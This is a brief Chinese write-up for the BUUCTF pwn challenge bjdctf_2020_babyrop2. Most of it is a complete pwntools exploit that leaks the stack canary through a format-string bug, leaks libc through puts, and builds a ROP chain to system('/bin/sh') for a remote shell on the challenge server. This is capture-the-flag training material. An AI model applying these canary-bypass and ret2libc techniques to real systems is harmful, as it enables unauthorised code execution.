[BUUCTF-pwn]——bjdctf_2020_babyrop2
还是先checksec一下。开启了canary
在IDA中,一看发现思路很清楚呀
思路
给的提示好明显,
第一个函数给你提示,泄露libc
第二个格式化字符串漏洞,泄露canary
第三个函数栈溢出,有了canary和puts函数,我们就可以泄露出libc,进而构造获得shell的rop链
exploit
from pwn import *
from LibcSearcher import *
#p = process('./bjdctf_2020_babyrop2')
p =remote('node3.buuoj.cn',25755)
elf = ELF('./bjdctf_2020_babyrop2')
#gdb.attach(p, 'b *0x0000000000400857')
pop_rdi = 0x0000000000400993
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln = elf.symbols['vuln']
payload = '%7$p'
p.recv()
p.sendline(payload)
p.recvuntil('0x')
canary = int(p.recv(16),16)
payload = 'a' * (0x20 - 8) + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)
p.sendlineafter('Pull up your sword and tell me u story!\n',payload)
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(puts_addr)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0x20 - 8) + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(binsh) + p64(system)
p.sendlineafter('Pull up your sword and tell me u story!\n',payload)
p.interactive()